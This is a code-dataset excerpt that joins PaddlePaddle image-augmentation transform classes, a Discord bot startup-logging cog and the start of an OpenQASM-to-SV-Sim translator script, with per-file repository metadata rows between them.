i = (height - h) // 2
j = (width - w) // 2
return i, j, h, w
def _apply_image(self, img):
i, j, h, w = self._get_param(img)
cropped_img = F.crop(img, i, j, h, w)
return F.resize(cropped_img, self.size, self.interpolation)
class CenterCrop(BaseTransform):
"""Crops the given the input data at the center.
Args:
size (int|list|tuple): Target size of output image, with (height, width) shape.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A cropped image.
Returns:
A callable object of CenterCrop.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import CenterCrop
transform = CenterCrop(224)
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self, size, keys=None):
super(CenterCrop, self).__init__(keys)
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
self.size = size
def _apply_image(self, img):
return F.center_crop(img, self.size)
class RandomHorizontalFlip(BaseTransform):
"""Horizontally flip the input data randomly with a given probability.
Args:
prob (float, optional): Probability of the input data being flipped. Should be in [0, 1]. Default: 0.5
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A horiziotal flipped image.
Returns:
A callable object of RandomHorizontalFlip.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import RandomHorizontalFlip
transform = RandomHorizontalFlip(0.5)
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self, prob=0.5, keys=None):
super(RandomHorizontalFlip, self).__init__(keys)
assert 0 <= prob <= 1, "probability must be between 0 and 1"
self.prob = prob
def _apply_image(self, img):
if random.random() < self.prob:
return F.hflip(img)
return img
class RandomVerticalFlip(BaseTransform):
"""Vertically flip the input data randomly with a given probability.
Args:
prob (float, optional): Probability of the input data being flipped. Default: 0.5
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A vertical flipped image.
Returns:
A callable object of RandomVerticalFlip.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import RandomVerticalFlip
transform = RandomVerticalFlip()
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self, prob=0.5, keys=None):
super(RandomVerticalFlip, self).__init__(keys)
assert 0 <= prob <= 1, "probability must be between 0 and 1"
self.prob = prob
def _apply_image(self, img):
if random.random() < self.prob:
return F.vflip(img)
return img
class Normalize(BaseTransform):
"""Normalize the input data with mean and standard deviation.
Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels,
this transform will normalize each channel of the input data.
``output[channel] = (input[channel] - mean[channel]) / std[channel]``
Args:
mean (int|float|list|tuple): Sequence of means for each channel.
std (int|float|list|tuple): Sequence of standard deviations for each channel.
data_format (str, optional): Data format of img, should be 'HWC' or
'CHW'. Default: 'CHW'.
to_rgb (bool, optional): Whether to convert to rgb. Default: False.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A normalized array or tensor.
Returns:
A callable object of Normalize.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import Normalize
normalize = Normalize(mean=[127.5, 127.5, 127.5],
std=[127.5, 127.5, 127.5],
data_format='HWC')
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = normalize(fake_img)
print(fake_img.shape)
print(fake_img.max, fake_img.max)
"""
def __init__(self,
mean=0.0,
std=1.0,
data_format='CHW',
to_rgb=False,
keys=None):
super(Normalize, self).__init__(keys)
if isinstance(mean, numbers.Number):
mean = [mean, mean, mean]
if isinstance(std, numbers.Number):
std = [std, std, std]
self.mean = mean
self.std = std
self.data_format = data_format
self.to_rgb = to_rgb
def _apply_image(self, img):
return F.normalize(img, self.mean, self.std, self.data_format,
self.to_rgb)
class Transpose(BaseTransform):
"""Transpose input data to a target format.
For example, most transforms use HWC mode image,
while the Neural Network might use CHW mode input tensor.
output image will be an instance of numpy.ndarray.
Args:
order (list|tuple, optional): Target order of input data. Default: (2, 0, 1).
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(np.ndarray|Paddle.Tensor): A transposed array or tensor. If input
is a PIL.Image, output will be converted to np.ndarray automatically.
Returns:
A callable object of Transpose.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import Transpose
transform = Transpose()
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.shape)
"""
def __init__(self, order=(2, 0, 1), keys=None):
super(Transpose, self).__init__(keys)
self.order = order
def _apply_image(self, img):
if F._is_tensor_image(img):
return img.transpose(self.order)
if F._is_pil_image(img):
img = np.asarray(img)
if len(img.shape) == 2:
img = img[..., np.newaxis]
return img.transpose(self.order)
class BrightnessTransform(BaseTransform):
"""Adjust brightness of the image.
Args:
value (float): How much to adjust the brightness. Can be any
non negative number. 0 gives the original image
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): An image with a transform in brghtness.
Returns:
A callable object of BrightnessTransform.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import BrightnessTransform
transform = BrightnessTransform(0.4)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
"""
def __init__(self, value, keys=None):
super(BrightnessTransform, self).__init__(keys)
self.value = _check_input(value, 'brightness')
def _apply_image(self, img):
if self.value is None:
return img
brightness_factor = random.uniform(self.value[0], self.value[1])
return F.adjust_brightness(img, brightness_factor)
class ContrastTransform(BaseTransform):
"""Adjust contrast of the image.
Args:
value (float): How much to adjust the contrast. Can be any
non negative number. 0 gives the original image
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): An image with a transform in contrast.
Returns:
A callable object of ContrastTransform.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import ContrastTransform
transform = ContrastTransform(0.4)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
"""
def __init__(self, value, keys=None):
super(ContrastTransform, self).__init__(keys)
if value < 0:
raise ValueError("contrast value should be non-negative")
self.value = _check_input(value, 'contrast')
def _apply_image(self, img):
if self.value is None:
return img
contrast_factor = random.uniform(self.value[0], self.value[1])
return F.adjust_contrast(img, contrast_factor)
class SaturationTransform(BaseTransform):
"""Adjust saturation of the image.
Args:
value (float): How much to adjust the saturation. Can be any
non negative number. 0 gives the original image
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): An image with a transform in saturation.
Returns:
A callable object of SaturationTransform.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import SaturationTransform
transform = SaturationTransform(0.4)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
"""
def __init__(self, value, keys=None):
super(SaturationTransform, self).__init__(keys)
self.value = _check_input(value, 'saturation')
def _apply_image(self, img):
if self.value is None:
return img
saturation_factor = random.uniform(self.value[0], self.value[1])
return F.adjust_saturation(img, saturation_factor)
class HueTransform(BaseTransform):
"""Adjust hue of the image.
Args:
value (float): How much to adjust the hue. Can be any number
between 0 and 0.5, 0 gives the original image
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): An image with a transform in hue.
Returns:
A callable object of HueTransform.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import HueTransform
transform = HueTransform(0.4)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
"""
def __init__(self, value, keys=None):
super(HueTransform, self).__init__(keys)
self.value = _check_input(
value, 'hue', center=0, bound=(-0.5, 0.5), clip_first_on_zero=False)
def _apply_image(self, img):
if self.value is None:
return img
hue_factor = random.uniform(self.value[0], self.value[1])
return F.adjust_hue(img, hue_factor)
class ColorJitter(BaseTransform):
"""Randomly change the brightness, contrast, saturation and hue of an image.
Args:
brightness (float): How much to jitter brightness.
Chosen uniformly from [max(0, 1 - brightness), 1 + brightness]. Should be non negative numbers.
contrast (float): How much to jitter contrast.
Chosen uniformly from [max(0, 1 - contrast), 1 + contrast]. Should be non negative numbers.
saturation (float): How much to jitter saturation.
Chosen uniformly from [max(0, 1 - saturation), 1 + saturation]. Should be non negative numbers.
hue (float): How much to jitter hue.
Chosen uniformly from [-hue, hue]. Should have 0<= hue <= 0.5.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A color jittered image.
Returns:
A callable object of ColorJitter.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import ColorJitter
transform = ColorJitter(0.4, 0.4, 0.4, 0.4)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
"""
def __init__(self, brightness=0, contrast=0, saturation=0, hue=0,
keys=None):
super(ColorJitter, self).__init__(keys)
self.brightness = brightness
self.contrast = contrast
self.saturation = saturation
self.hue = hue
def _get_param(self, brightness, contrast, saturation, hue):
"""Get a randomized transform to be applied on image.
Arguments are same as that of __init__.
Returns:
Transform which randomly adjusts brightness, contrast and
saturation in a random order.
"""
transforms = []
if brightness is not None:
transforms.append(BrightnessTransform(brightness, self.keys))
if contrast is not None:
transforms.append(ContrastTransform(contrast, self.keys))
if saturation is not None:
transforms.append(SaturationTransform(saturation, self.keys))
if hue is not None:
transforms.append(HueTransform(hue, self.keys))
random.shuffle(transforms)
transform = Compose(transforms)
return transform
def _apply_image(self, img):
"""
Args:
img (PIL Image): Input image.
Returns:
PIL Image: Color jittered image.
"""
transform = self._get_param(self.brightness, self.contrast,
self.saturation, self.hue)
return transform(img)
class RandomCrop(BaseTransform):
"""Crops the given CV Image at a random location.
Args:
size (sequence|int): Desired output size of the crop. If size is an
int instead of sequence like (h, w), a square crop (size, size) is
made.
padding (int|sequence|optional): Optional padding on each border
of the image. If a sequence of length 4 is provided, it is used to pad left,
top, right, bottom borders respectively. Default: 0.
pad_if_needed (boolean|optional): It will pad the image if smaller than the
desired size to avoid raising an exception. Default: False.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A random cropped image.
Returns:
A callable object of RandomCrop.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import RandomCrop
transform = RandomCrop(224)
fake_img = Image.fromarray((np.random.rand(324, 300, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self,
size,
padding=None,
pad_if_needed=False,
fill=0,
padding_mode='constant',
keys=None):
super(RandomCrop, self).__init__(keys)
if isinstance(size, numbers.Number):
self.size = (int(size), int(size))
else:
self.size = size
self.padding = padding
self.pad_if_needed = pad_if_needed
self.fill = fill
self.padding_mode = padding_mode
def _get_param(self, img, output_size):
"""Get parameters for ``crop`` for a random crop.
Args:
img (PIL Image): Image to be cropped.
output_size (tuple): Expected output size of the crop.
Returns:
tuple: params (i, j, h, w) to be passed to ``crop`` for random crop.
"""
w, h = _get_image_size(img)
th, tw = output_size
if w == tw and h == th:
return 0, 0, h, w
i = random.randint(0, h - th)
j = random.randint(0, w - tw)
return i, j, th, tw
def _apply_image(self, img):
"""
Args:
img (PIL Image): Image to be cropped.
Returns:
PIL Image: Cropped image.
"""
if self.padding is not None:
img = F.pad(img, self.padding, self.fill, self.padding_mode)
w, h = _get_image_size(img)
# pad the width if needed
if self.pad_if_needed and w < self.size[1]:
img = F.pad(img, (self.size[1] - w, 0), self.fill,
self.padding_mode)
# pad the height if needed
if self.pad_if_needed and h < self.size[0]:
img = F.pad(img, (0, self.size[0] - h), self.fill,
self.padding_mode)
i, j, h, w = self._get_param(img, self.size)
return F.crop(img, i, j, h, w)
class Pad(BaseTransform):
"""Pads the given CV Image on all sides with the given "pad" value.
Args:
padding (int|list|tuple): Padding on each border. If a single int is provided this
is used to pad all borders. If list/tuple of length 2 is provided this is the padding
on left/right and top/bottom respectively. If a list/tuple of length 4 is provided
this is the padding for the left, top, right and bottom borders
respectively.
fill (int|list|tuple): Pixel fill value for constant fill. Default is 0. If a list/tuple of
length 3, it is used to fill R, G, B channels respectively.
This value is only used when the padding_mode is constant
padding_mode (str): Type of padding. Should be: constant, edge, reflect or symmetric. Default is constant.
``constant`` means pads with a constant value, this value is specified with fill.
``edge`` means pads with the last value at the edge of the image.
``reflect`` means pads with reflection of image (without repeating the last value on the edge)
padding ``[1, 2, 3, 4]`` with 2 elements on both sides in reflect mode
will result in ``[3, 2, 1, 2, 3, 4, 3, 2]``.
``symmetric`` menas pads with reflection of image (repeating the last value on the edge)
padding ``[1, 2, 3, 4]`` with 2 elements on both sides in symmetric mode
will result in ``[2, 1, 1, 2, 3, 4, 4, 3]``.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A paded image.
Returns:
A callable object of Pad.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import Pad
transform = Pad(2)
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self, padding, fill=0, padding_mode='constant', keys=None):
assert isinstance(padding, (numbers.Number, list, tuple))
assert isinstance(fill, (numbers.Number, str, list, tuple))
assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
if isinstance(padding, list):
padding = tuple(padding)
if isinstance(fill, list):
fill = tuple(fill)
if isinstance(padding, Sequence) and len(padding) not in [2, 4]:
raise ValueError(
"Padding must be an int or a 2, or 4 element tuple, not a " +
"{} element tuple".format(len(padding)))
super(Pad, self).__init__(keys)
self.padding = padding
self.fill = fill
self.padding_mode = padding_mode
def _apply_image(self, img):
"""
Args:
img (PIL Image): Image to be padded.
Returns:
PIL Image: Padded image.
"""
return F.pad(img, self.padding, self.fill, self.padding_mode)
class RandomRotation(BaseTransform):
"""Rotates the image by angle.
Args:
degrees (sequence or float or int): Range of degrees to select from.
If degrees is a number instead of sequence like (min, max), the range of degrees
will be (-degrees, +degrees) clockwise order.
interpolation (str, optional): Interpolation method. If omitted, or if the
image has only one channel, it is set to PIL.Image.NEAREST or cv2.INTER_NEAREST
according the backend. when use pil backend, support method are as following:
- "nearest": Image.NEAREST,
- "bilinear": Image.BILINEAR,
- "bicubic": Image.BICUBIC
when use cv2 backend, support method are as following:
- "nearest": cv2.INTER_NEAREST,
- "bilinear": cv2.INTER_LINEAR,
- "bicubic": cv2.INTER_CUBIC
expand (bool|optional): Optional expansion flag. Default: False.
If true, expands the output to make it large enough to hold the entire rotated image.
If false or omitted, make the output image the same size as the input image.
Note that the expand flag assumes rotation around the center and no translation.
center (2-tuple|optional): Optional center of rotation.
Origin is the upper left corner.
Default is the center of the image.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A rotated image.
Returns:
A callable object of RandomRotation.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import RandomRotation
transform = RandomRotation(90)
fake_img = Image.fromarray((np.random.rand(200, 150, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self,
degrees,
interpolation='nearest',
expand=False,
center=None,
fill=0,
keys=None):
if isinstance(degrees, numbers.Number):
if degrees < 0:
raise ValueError(
"If degrees is a single number, it must be positive.")
self.degrees = (-degrees, degrees)
else:
if len(degrees) != 2:
raise ValueError(
"If degrees is a sequence, it must be of len 2.")
self.degrees = degrees
super(RandomRotation, self).__init__(keys)
self.interpolation = interpolation
self.expand = expand
self.center = center
self.fill = fill
def _get_param(self, degrees):
angle = random.uniform(degrees[0], degrees[1])
return angle
def _apply_image(self, img):
"""
Args:
img (PIL.Image|np.array): Image to be rotated.
Returns:
PIL.Image or np.array: Rotated image.
"""
angle = self._get_param(self.degrees)
return F.rotate(img, angle, self.interpolation, self.expand,
self.center, self.fill)
class Grayscale(BaseTransform):
"""Converts image to grayscale.
Args:
num_output_channels (int): (1 or 3) number of channels desired for output image
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): Grayscale version of the input image.
- If output_channels == 1 : returned image is single channel
- If output_channels == 3 : returned image is 3 channel with r == g == b
Returns:
A callable object of Grayscale.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import Grayscale
transform = Grayscale()
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(np.array(fake_img).shape)
"""
def __init__(self, num_output_channels=1, keys=None):
super(Grayscale, self).__init__(keys)
self.num_output_channels = num_output_channels
def _apply_image(self, img):
"""
Args:
img (PIL Image): Image to be converted to grayscale.
Returns:
PIL Image: Randomly grayscaled image.
"""
return F.to_grayscale(img, self.num_output_channels)
| 34.369288 | 114 | 0.587124 |
b2b669eef745e198b918a4a4229024633a13600a | 95 | py | Python | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 2 | 2020-06-30T08:49:54.000Z | 2020-09-18T13:59:00.000Z | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 11 | 2019-12-04T23:45:34.000Z | 2022-02-10T13:22:03.000Z | recyclebin/apps.py | XanderTerbl1/FileUp | ca6221a3d3b106dcbac99f4413e7a4845eac6842 | [
"MIT"
] | 2 | 2020-05-19T06:53:24.000Z | 2020-10-08T20:11:29.000Z | from django.apps import AppConfig
class RecyclebinConfig(AppConfig):
name = 'recyclebin'
| 15.833333 | 34 | 0.768421 |
2d03cd5805850cca3519ef75334047f291049240 | 1,172 | py | Python | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 1,003 | 2018-11-17T21:10:01.000Z | 2022-03-31T22:50:39.000Z | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 1,474 | 2018-11-17T10:18:14.000Z | 2022-03-31T18:01:39.000Z | bot/exts/backend/logging.py | hugovk/bot | 46d3f877b569a8a6db8a50fbd80ff49c90ba04cf | [
"MIT",
"BSD-3-Clause"
] | 771 | 2018-11-21T08:36:07.000Z | 2022-03-31T14:56:39.000Z | from discord import Embed
from discord.ext.commands import Cog
from bot.bot import Bot
from bot.constants import Channels, DEBUG_MODE
from bot.log import get_logger
from bot.utils import scheduling
log = get_logger(__name__)
class Logging(Cog):
"""Debug logging module."""
def __init__(self, bot: Bot):
self.bot = bot
scheduling.create_task(self.startup_greeting(), event_loop=self.bot.loop)
async def startup_greeting(self) -> None:
"""Announce our presence to the configured devlog channel."""
await self.bot.wait_until_guild_available()
log.info("Bot connected!")
embed = Embed(description="Connected!")
embed.set_author(
name="Python Bot",
url="https://github.com/python-discord/bot",
icon_url=(
"https://raw.githubusercontent.com/"
"python-discord/branding/main/logos/logo_circle/logo_circle_large.png"
)
)
if not DEBUG_MODE:
await self.bot.get_channel(Channels.dev_log).send(embed=embed)
def setup(bot: Bot) -> None:
"""Load the Logging cog."""
bot.add_cog(Logging(bot))
| 27.904762 | 86 | 0.647611 |
18e3264b81bd595d81335ddb577d7885a04fe956 | 13,678 | py | Python | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | svsim/tool/svsim_qasm.py | yukwangmin/SV-Sim | 1b6b71cb490e7a1eac3d6ebc24777590d48378de | [
"MIT"
] | null | null | null | # ---------------------------------------------------------------------------
# SV-Sim: Density-Matrix Quantum Circuit Simulation Environement
# ---------------------------------------------------------------------------
# Ang Li, Senior Computer Scientist
# Pacific Northwest National Laboratory(PNNL), U.S.
# Homepage: http://www.angliphd.com
# GitHub repo: http://www.github.com/pnnl/SV-Sim
# PNNL-IPID: 31919-E, ECCN: EAR99, IR: PNNL-SA-143160
# BSD Lincese.
# ---------------------------------------------------------------------------
# File: svsim_qasm.py
# Translate OpenQASM assembly code to SVSim python code
# ---------------------------------------------------------------------------
import argparse
import string
import os
import cmath
import sys
import math
#======= Description ========
# Try to address two types of circuits in OpenQASM code:
# (1) User-defined functional module circuit
# (2) Main circuits
#======= Global tables and variables =========
# Starndard gates are gates defined in OpenQASM header.
# Dictionary in {"gate name": number of standard gates inside}
STANDARD_GATE_TABLE = {
"u3":1, #3-parameter 2-pulse single qubit gate
"u2":1, #2-parameter 1-pulse single qubit gate
"u1":1, #1-parameter 0-pulse single qubit gate
"cx":1, #controlled-NOT
"id":1, #idle gate(identity)
"x":1, #Pauli gate: bit-flip
"y":1, #Pauli gate: bit and phase flip
"z":1, #Pauli gate: phase flip
"h":1, #Clifford gate: Hadamard
"s":1, #Clifford gate: sqrt(Z) phase gate
"sdg":1, #Clifford gate: conjugate of sqrt(Z)
"t":1, #C3 gate: sqrt(S) phase gate
"tdg":1, #C3 gate: conjugate of sqrt(S)
"rx":1, #Rotation around X-axis
"ry":1, #Rotation around Y-axis
"rz":1, #Rotation around Z-axis
"c1":1, #Arbitrary 1-qubit gate
"c2":1} #Arbitrary 2-qubit gate
# Composition gates are gates defined in OpenQASM header.
# Dictionary in {"gate name": number of standard gates inside}
COMPOSITION_GATE_TABLE = {
"cz":3, #Controlled-Phase
"cy":3, #Controlled-Y
"swap":3, #Swap
"ch":11, #Controlled-H
"ccx":15, #C3 gate: Toffoli
"cswap":17, #Fredkin
"crx":5, #Controlled RX rotation
"cry":4, #Controlled RY rotation
"crz":4, #Controlled RZ rotation
"cu1":5, #Controlled phase rotation
"cu3":5, #Controlled-U
"rxx":7, #Two-qubit XX rotation
"rzz":3, #Two-qubit ZZ rotation
"rccx":9, #Relative-phase CCX
"rc3x":18, #Relative-phase 3-controlled X gate
"c3x":27, #3-controlled X gate
"c3sqrtx":27, #3-controlled sqrt(X) gate
"c4x":87 #4-controlled X gate
}
# OpenQASM native gate table, other gates are user-defined.
GATE_TABLE = dict(STANDARD_GATE_TABLE.items() + COMPOSITION_GATE_TABLE.items())
# ==================================================================================
# For the statistics of the number of CNOT or CX gate in the circuit
# Number of CX in Standard gates
STANDARD_CX_TABLE = { "u3":0, "u2":0, "u1":0, "cx":1, "id":0, "x":0, "y":0, "z":0, "h":0,
"s":0, "sdg":0, "t":0, "tdg":0, "rx":0, "ry":0, "rz":0, "c1":0, "c2":1}
# Number of CX in Composition gates
COMPOSITION_CX_TABLE = {"cz":1, "cy":1, "swap":3, "ch":2, "ccx":6, "cswap":8, "crx":2, "cry":2,
"crz":2, "cu1":2, "cu3":2, "rxx":2, "rzz":2, "rccx":3, "rc3x":6, "c3x":6, "c3sqrtx":6,
"c4x":18}
CX_TABLE = dict(STANDARD_CX_TABLE.items() + COMPOSITION_CX_TABLE.items())
# We need to map from a user-defined local qubit-register to a unified global array for SV-Sim
global_array = {} #Field start position
field_length = {} #Field length
gate_num = 0
cx_num = 0
seg_num = 0
SM = "sm_70"
# To register and look-up user-defined function in QASM
# Format: {"function_name": gate_num}
function_table = {}
# Format: {"function_name": cx_gate_num}
cx_table = {}
#Keywords in QASM that are currently not used
other_keys = ["measure", "barrier", "OPENQASM", "include", "creg", "if", "reset"]
#======= Helper Function ========
def get_op(line):
if line.find("(") != -1:
line = line[:line.find("(")].strip()
op = line.split(" ")[0].strip()
return op
#======= Mapping Functions =========
# Mapping from qreg to global array
def qreg_to_ga(qreg_string):
#print (qreg_string)
if qreg_string.find("[") != -1:
field = qreg_string[:qreg_string.find("[")].strip()
field_shift = int(qreg_string[qreg_string.find("[")+1:qreg_string.find("]")])
ga_shift = str(global_array[field] + field_shift)
else:
field = qreg_string.strip()
ga_shift = ""
#if field.find("(") != -1:
#expr = field[field.find("(")+1:field.find(")")]
#for item in expr.split(","):
#ga_shift = str(eval(item.strip(), {'pi':cmath.pi})) + ", "
#ga_shift = ga_shift[:-2]
#ga_shift = str(eval(expr, {'pi':cmath.pi}))
#field = field[field.find(")")+1:].strip()
if field in global_array:
ga_shift += str(global_array[field])
else:
ga_shift += field
return ga_shift
# Mapping for a param_list, such as "cout[3], cin[2], par[0]"
def paramlist_to_ga(param_list):
slist = []
recursive = False
if param_list.find(')') != -1:
recursive = True
slist.append("")
gate_param = param_list.split(')')[0].split(',')
gate_param = [p.strip().strip('(').strip() for p in gate_param]
for expr in gate_param:
slist[0] += str(eval(expr, {'pi':cmath.pi})) + ", "
param_list = param_list.split(')')[1]
params = param_list.strip(';').split(",")
params = [i.strip() for i in params]
#check if any param is a vector
num_bits = 1
for param in params:
if (param.find('[') == -1) and (param in field_length) and field_length[param]>1:
num_bits = field_length[param]
break
for b in range(0,num_bits):
s = ""
for param in params:
if param != "":
if (param.find('[') == -1) and (param in field_length) and field_length[param]>1:
if b >= field_length[param]:
print ("Error in Syntax!")
exit()
else:
param = param + '[' + str(b) + ']'
ga_shift = qreg_to_ga(param)
s += str(ga_shift) + ", "
if recursive:
slist[-1] = slist[-1] + s[:-2]
else:
slist.append(s[:-2])
#print (slist, num_bits)
return slist
# Look up built-in or user-defined gates in a user-defined gate function
def function_gate(line, line_id):
s = str("")
n = 0
cx = 0
line = line.strip()
if line == "":
return s, n, cx
op = get_op(line)
if op in function_table: # User-defined gate function
s = "\t" + op + "(sim, "
#line = line[len(op)+1:-1].replace(')','),')
line = line[len(op)+1:].replace(')','),')
params = line.split(",")
#print (params)
for param in params:
s += param.strip() + ", "
s = s[:-2] + "):\n"
n = function_table[op]
cx = cx_table[op]
elif op in GATE_TABLE: # OpenQASM built-in gate
paramlist_ga = paramlist_to_ga(line[line.find(" ")+1:])
for p in paramlist_ga:
s += "\tsim.append(sim." + op.upper() + "(" + p + "))\n"
n = len(paramlist_ga) * GATE_TABLE[op]
cx = len(paramlist_ga) * CX_TABLE[op]
elif op in ['{','}']:
s = ""
else:
print ('==Line-' + str(line_id) + ': "' + line + '" is not a gate in Function!')
return s,n,cx
# Look up built-in gates in the global circuit
def builtin_gate(line, line_id):
s = str("")
n = 0
cx = 0
line = line.strip()
if line == "":
return s
op = get_op(line)
if op in GATE_TABLE:
if line.find("(") != -1:
line = line.replace("("," (")
line = line.replace(")","),")
#print (line)
paramlist_ga = paramlist_to_ga(line[line.find(" ")+1:])
for p in paramlist_ga:
s += "sim.append(sim." + op.upper() + "(" + p + "))\n"
n = len(paramlist_ga) * GATE_TABLE[op]
cx = len(paramlist_ga) * CX_TABLE[op]
else:
print ('==Line-' + str(line_id) + ': "' + line + '" is not a gate!')
return s, n, cx
## Parsing the source OpenQASM file line by line
def parse(infile, mainfile):
global global_array
global field_length
global function_table
global cx_table
global gate_num
global cx_num
global seg_num
prev_gate_num = 0
qreg_idx = 0
start_global_circuit = False
s = str("")
outfile = mainfile
outfile.write("sim = svsim.Simulation(int(sys.argv[1]), int(sys.argv[2]))\n\n")
lines = infile.readlines()
i = 0
while i < len(lines):
l = lines[i].strip().strip('\n')
s = ""
if l != "":
## User-defined comments,
if l.lstrip().startswith("//"):
s += '#' + l[l.find("//")+2:] + "\n"
outfile.write(s)
else:
# If comment at end, extract op
if l.find("//") != -1:
l = l[:l.find("//")]
# Start to parse
op = get_op(l)
# Invoke user-defined function
if op in function_table:
s = ""
paramlist_ga = paramlist_to_ga(l[len(op)+1:-1])
for p in paramlist_ga:
s += "" + op + "(sim, " + p + ")\n"
